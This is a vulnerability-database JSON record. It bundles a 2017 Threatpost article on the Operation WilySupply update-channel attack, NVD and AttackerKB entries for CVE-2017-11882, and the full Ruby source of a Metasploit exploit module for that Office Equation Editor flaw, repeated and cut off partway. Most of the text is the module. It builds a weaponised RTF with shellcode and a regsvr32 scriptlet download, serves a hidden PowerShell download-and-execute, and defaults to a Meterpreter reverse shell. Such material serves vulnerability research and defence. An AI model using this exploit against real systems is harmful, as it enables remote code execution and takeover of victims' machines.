{"id": "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "type": "threatpost", "bulletinFamily": "info", "title": "Supply Chain Update Software Unknowingly Used in Attacks", "description": "Microsoft said a recent attack it calls [Operation WilySupply](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) utilized the update mechanism of an unnamed software editing tool to infect targets in the finance and payment industries with in-memory malware.\n\nThe unnamed editing tool was used to send unsigned malicious updates to users in targeted attacks, according to a report published Thursday.\n\n\u201cWhile their software supply chain served as a channel for attacking other organizations, they themselves were also under attack,\u201d said Elia Florio, senior security software engineer, with Windows Defender ATP Research Team.\n\nIt\u2019s unclear just how many affected parties there were and when the attacks took place. However, Florio said the attacks were selective and purposely went after only the \u201cmost valuable targets\u201d in an effort to avoid detection.\n\n\u201cWe believe that the activity group behind Operation WilySupply is motivated by financial gain. They compromise third-party software packages delivered through updaters and other channels to reach victims who are mostly in the finance and payment industries,\u201d Florio wrote.\n\nHe said Microsoft began investigating the suspicious activity after computers using the updater were red-flagged by Windows ATP. \u201cWindows Defender ATP initially called our attention to alerts flagging suspicious PowerShell scripts, self-deletion of executables, and other suspect activities,\u201d Florio wrote.\n\nA forensic analysis of the _Temp Folder _on one of the targeted systems revealed the legitimate third-party updater running as service. However, closer inspection revealed the updater also had downloaded an unsigned, low-prevalence executable just before the malicious activity was observed, according to Florio.\n\n\u201cThe downloaded executable turned out to be a malicious binary (Rivit) that launched PowerShell scripts bundled with the Meterpreter reverse shell, which granted the remote attacker silent control,\u201d Florio wrote. \u201cThe malware binary, named by the cybercriminals _ue.exe_, was a small piece of code with the sole purpose of launching a Meterpreter shell.\u201d\n\nMeterpreter is a legitimate pen-testing tool packaged with the Metasploit framework and can be used to carry out in-memory or fileless attacks. Meterpreter attaches itself to a process and is capable of carrying out in-memory DLL injections. It\u2019s one of several open-source tools such as Lazagne that allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary\u2019s control server. In-memory or fileless attacks, Florio said, are a [fast growing trend among cybercriminals](<https://threatpost.com/hard-target-fileless-malware/125054/>).\n\nAttackers, Florio said, were taking advantage of the trusted relationship within the context of the software supply chain. The victims were unaware that a malicious third-part had infiltrated the remote update channel of the supply chain.\n\nSelf-updating software has been targeted in the past on a number of occasions, points out Microsoft. Unrelated incidents include adversaries targeting Altair Technologies\u2019 EvLog update process, the auto-update mechanism for South Korean software SimDisk and the update server used by ESTsoft\u2019s ALZip compression application, according to researchers.\n\nNoteworthy to the attack was the fact adversaries conducted advanced recon that included qualifying systems with tools such as .NET, IPCONFIG, NETSTAT, NLTEST, and WHOAMI, Florio said.\n\nAdditional techniques, tactics and procedures Florio noted included; memory-only payloads assisted by PowerShell and Meterpreter running in rundll32; Migration into long-living processes, such as the Windows Printer Spooler or _spoolsv_._exe_; use of common tools like Mimikatz and Kerberoast to dump hashes; ateral movement using Windows Management Instrumentation (WMI), specifically the _WMIC /node_ command; and persistence through scheduled tasks created using SCHTASKS and AT commands.\n\nTips on protection from such attacks include hardening defenses with strong encryption used in update channels, putting script and configuration files in signed containers and adopting Security Development Lifecycle best practices, according to Florio.\n", "published": "2017-05-05T14:11:31", "modified": "2017-05-05T18:11:31", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/supply-chain-update-software-unknowingly-used-in-attacks/125483/", "reporter": "Tom Spring", "references": ["https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/", "https://threatpost.com/hard-target-fileless-malware/125054/"], "cvelist": ["CVE-2017-11882"], "lastseen": "2018-10-06T22:53:44", "viewCount": 6, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2018-10-06T22:53:44", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-11882"]}, {"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/"]}, {"type": "symantec", "idList": ["SMNTC-101757"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892510", "MYHACK58:62201892253"]}, {"type": "threatpost", "idList": ["THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:0530F0C06C353C977E040FFD41710189", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C"]}, {"type": "mskb", "idList": ["KB3162047"]}, {"type": "mmpc", "idList": ["MMPC:E948BE7841CC8D594A264907989ACD46"]}], "modified": "2018-10-06T22:53:44", "rev": 2}, "vulnersScore": 6.2}}

{"cve": [{"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \"Microsoft Office Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11884.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11882", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-01-26T18:15:00", "cpe": ["cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2016"], "id": "CVE-2017-11882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-01-26T21:28:55", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-11884"], "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \u201cMicrosoft Office Memory Corruption Vulnerability\u201d. This CVE ID is unique from CVE-2017-11884.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:42pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products \n\n * Associated Malware: Loki, FormBook, Pony/FAREIT \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "published": "2017-11-15T00:00:00", "id": "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "href": "https://attackerkb.com/topics/oGYjzY0Hw3/cve-2017-11882", "type": "attackerkb", "title": "CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2021-02-22T20:34:12", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "2017-11-21T19:47:02", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb"}, {"lastseen": "2020-10-15T09:46:17", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n 